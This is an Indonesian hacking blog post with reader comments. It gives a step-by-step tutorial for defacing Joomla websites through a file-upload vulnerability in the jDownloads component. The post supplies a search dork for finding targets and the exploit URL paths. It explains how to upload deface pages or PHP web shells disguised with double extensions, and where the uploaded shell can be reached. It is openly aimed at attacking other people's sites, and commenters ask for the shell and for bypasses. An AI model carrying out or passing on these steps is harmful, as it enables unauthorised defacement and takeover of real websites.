Tuesday, 28 March 2017

Deface dengan eXploit JDownloads Shell Upload Vulnerability


Hello World; Siang Fans, Please Say Hello Haters ;*
Maaf baru bisa Share lagi ^_^ , lg ada urusan om ^_^
yoehh Gengs, lanjut lagi Blogwalking:D , Nah kali ini Gue cuma mau berbagi tentang salah satu Exploit Joomla (salah satu Bug/Celah pada CMS Joomla).
ini Bug lawas sih, kali aja masih crootz
Yupz, Tutorial Deface CMS Joomla dengan eXploit Jdownloads Shell Upload Vulnerability .

Let's Play with me Baby ;*


Dork : intext:"Powered by jDownloads"
(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)

eXploit :
/index.php?option=com_jdownloads&Itemid=1&view=upload
atau
/index.php?option=com_jdownloads&Itemid=1&task=upload

Script Deface dengan ekstensi deface.html.j, deface.txt.j atau yang mau upload Shell silahkan siapkan shell.php.php.j

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_jdownloads&Itemid=1&view=upload

3. Vulnerability ~ Muncul Form Seperti Gambar dibawah


4. Lalu isi data2 yang perlu, yang ada tanda merah di depan kotak Form., dan upload script deface atau shell kalian, contoh Gua upload file nue.php.php.j (upload dibagian screenshot)

5. Kalo sukses nanti Muncul icon + berwarna Hijau.

Note: gak semua file Shell bisa terbaca, jika tak terbaca langsung upload Script Deface kalean saja
6. File/Shell Akses: /images/jdownloads/screenshots/filelu.php.j


Nah begitu dah kira2 awkkwa.
kalo mau Scanner JDownloads Shell Upload Vulnerability nya bisa kesini

owh iya, Bila ada Link atau gambar pada Blog ini ada yang rusak/Mati, harap lapor disini

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Joomla Hacked~
Sekian dan semoga bermanfaat .. terimakasih

Source and Thanks to: Idiot Attacker

./Nuenomaru

Dan Gua tertawa, Saksikan Para Hacker Pembual Mulai BerMunculan





Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

7 comments

Om,boleh minta Shell yang Om pake ga?

Om,boleh minta Shell yang Om pake ga?

shell gak pernah saya simpen kak hehehe
#Nuenomaru

web yg seperti apa yg bisa di def ?

Ilmu nya bermanfaat om :D makasih

cara bypass You don't have permission to access gimana kak T_T

itu berarti udah dicopot cara defacenya di web itu gan


EmoticonEmoticon